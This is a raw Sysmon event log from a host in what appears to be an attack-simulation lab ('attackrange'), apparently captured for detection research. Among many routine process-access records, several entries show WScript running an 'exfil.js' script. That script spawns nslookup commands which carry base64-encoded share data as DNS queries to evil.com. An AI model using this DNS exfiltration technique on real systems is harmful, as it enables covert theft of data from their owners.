14:21:30.312{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000208499Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:30.312{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000208498Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:30.312{2E1864BB-FA28-6299-3207-000000005F02}50324048C:\Windows\system32\csrss.exe{2E1864BB-18EA-629A-7243-000000005F02}7144C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000208497Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:30.312{2E1864BB-18E0-629A-6742-000000005F02}39764004C:\Windows\System32\WScript.exe{2E1864BB-18EA-629A-7243-000000005F02}7144C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e79b|C:\Windows\System32\windows.storage.dll+16e4b1|C:\Windows\System32\windows.storage.dll+16e0fe|C:\Windows\System32\windows.storage.dll+16f3a0|C:\Windows\System32\windows.storage.dll+16de4e|C:\Windows\System32\windows.storage.dll+fce4d|C:\Windows\System32\windows.storage.dll+fd58c|C:\Windows\System32\windows.storage.dll+fc8f0|C:\Windows\System32\SHELL32.dll+49d0f|C:\Windows\System32\SHELL32.dll+49b9c|C:\Windows\System32\SHELL32.dll+b2f5e|C:\Windows\System32\shcore.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000208496Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:30.315{2E1864BB-18EA-629A-7243-000000005F02}7144C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQ== evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlwydssx.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{2E1864BB-18E0-629A-6742-000000005F02}3976C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 23542300x8000000000000000208495Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:30.312{2E1864BB-18E0-629A-6742-000000005F02}3976ATTACKRANGE\AdministratorC:\Windows\System32\WScript.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\nlgngfxt.tmpMD5=D9DF221F6D351CB50A3CBB01BFD8B97F,SHA256=8D9029C9E209585AD6E7701BC4A411971A01D3D7E0C67FCA5DA104D2C7FD6185,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000208494Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:30.280{2E1864BB-18EA-629A-7043-000000005F02}74684740C:\Windows\system32\conhost.exe{2E1864BB-18EA-629A-7143-000000005F02}2384C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000208493Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:30.277{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000208492Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:30.277{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000208491Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:30.276{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000208490Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:30.276{2E1864BB-FA28-6299-3207-000000005F02}50324048C:\Windows\system32\csrss.exe{2E1864BB-18EA-629A-7143-000000005F02}2384C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000208489Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:30.276{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000208488Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:30.275{2E1864BB-18EA-629A-6F43-000000005F02}24043776C:\Windows\system32\cmd.exe{2E1864BB-18EA-629A-7143-000000005F02}2384C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000208487Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:30.275{2E1864BB-18EA-629A-7143-000000005F02}2384C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=TXT U2hhcmVEZXNjOiBMb2dvbiBzZXJ2ZXIgc2hhcmUg evil.com C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{2E1864BB-18EA-629A-6F43-000000005F02}2404C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=TXT U2hhcmVEZXNjOiBMb2dvbiBzZXJ2ZXIgc2hhcmUg evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlgngfxt.tmp 2>&1 10341000x8000000000000000208486Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:30.243{2E1864BB-E13E-6299-1000-000000005F02}3641888C:\Windows\system32\svchost.exe{2E1864BB-18EA-629A-7043-000000005F02}7468C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000208485Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:30.243{2E1864BB-E13E-6299-1000-000000005F02}3641376C:\Windows\system32\svchost.exe{2E1864BB-18EA-629A-7043-000000005F02}7468C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000208484Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:30.243{2E1864BB-18EA-629A-7043-000000005F02}74684740C:\Windows\system32\conhost.exe{2E1864BB-18EA-629A-6F43-000000005F02}2404C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000208483Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:30.227{2E1864BB-FA28-6299-3207-000000005F02}50324048C:\Windows\system32\csrss.exe{2E1864BB-18EA-629A-7043-000000005F02}7468C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000208482Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:30.227{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000208481Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:30.227{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000208480Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:30.227{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000208479Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:30.227{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000208478Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:30.227{2E1864BB-FA28-6299-3207-000000005F02}50324048C:\Windows\system32\csrss.exe{2E1864BB-18EA-629A-6F43-000000005F02}2404C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000208477Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:30.227{2E1864BB-18E0-629A-6742-000000005F02}39766604C:\Windows\System32\WScript.exe{2E1864BB-18EA-629A-6F43-000000005F02}2404C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e79b|C:\Windows\System32\windows.storage.dll+16e4b1|C:\Windows\System32\windows.storage.dll+16e0fe|C:\Windows\System32\windows.storage.dll+16f3a0|C:\Windows\System32\windows.storage.dll+16de4e|C:\Windows\System32\windows.storage.dll+fce4d|C:\Windows\System32\windows.storage.dll+fd58c|C:\Windows\System32\windows.storage.dll+fc8f0|C:\Windows\System32\SHELL32.dll+49d0f|C:\Windows\System32\SHELL32.dll+49b9c|C:\Windows\System32\SHELL32.dll+b2f5e|C:\Windows\System32\shcore.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000208476Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:30.231{2E1864BB-18EA-629A-6F43-000000005F02}2404C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=TXT U2hhcmVEZXNjOiBMb2dvbiBzZXJ2ZXIgc2hhcmUg evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlgngfxt.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{2E1864BB-18E0-629A-6742-000000005F02}3976C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 23542300x8000000000000000208475Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:30.212{2E1864BB-18E0-629A-6742-000000005F02}3976ATTACKRANGE\AdministratorC:\Windows\System32\WScript.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\nlertf.tmpMD5=FFC3044AFB570E80F372BF53DBBB8207,SHA256=F6E14FFAF6210075EB5936267DAFDA62885E6C7751665C0CB6BEB4993231BC98,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000208474Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:30.196{2E1864BB-18EA-629A-6D43-000000005F02}38325380C:\Windows\system32\conhost.exe{2E1864BB-18EA-629A-6E43-000000005F02}1372C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000208473Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:30.196{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000208472Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:30.196{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000208471Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:30.196{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000208470Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 